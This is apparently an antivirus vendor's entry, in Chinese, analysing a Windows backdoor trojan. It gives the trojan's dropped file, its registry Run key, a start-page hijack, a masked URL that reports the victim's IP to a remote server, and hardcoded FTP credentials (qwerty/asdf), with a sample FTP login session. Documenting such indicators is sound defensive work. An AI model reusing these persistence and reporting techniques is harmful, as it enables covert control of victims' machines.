病毒名称(中文):
病毒别名:
威胁级别:
★☆☆☆☆
病毒类型:
黑客程序
病毒长度:
29010
影响系统:
Win9xWinMeWinNTWin2000WinXPWin2003
病毒行为:
该病毒是一个后门程序。运行该病毒会使系统成为ftp服务器。黑客通过病毒上报的系统信息可以完成控制受感染机器。
1、生成的文件
%SystemRoot%\csrss.exe
2、添加启动项
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
"system"="%SystemRoot%\csrss.exe"
3、修改ie主页
HKCU\Software\Microsoft\InternetExplorer\Main"StartPage"="http://debormammana.***/cgi-bin/tsp/tsout.cgi"
4、将感染机器信息上报到指定服务器,以便黑客通过用户ip地址控制感染机器
http://softwarediscount.***/images/add.php?name=%s&ip1=%s&ftpport=21&ftp...
5、结束指定进程。
6、添加注册表连接端口信息,是机器同时监听5637和21TCP端口
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SOCKSPort
"(Default)"="0x1605"(5637)
7、病毒在系统中添加用户名为qwerty密码为asdf的ftp用户,感染机器可以被完成控制。
--------------------------------------------------------
ftp>open127.0.0.1
Connectedto127.0.0.1.
220vict.FTP
User(127.0.0.1:(none)):qwerty
331Passwordrequiredforqwerty.
Password:
230Userloggedin,proceed.
ftp>ls
200Portcommandsuccessful.
150Openingdataconnection.
A:
C:
D:
E:
Z:
226Transferok
ftp:20bytesreceivedin0.02Seconds1.25Kbytes/sec.
ftp>
-------------------------------------------------------------
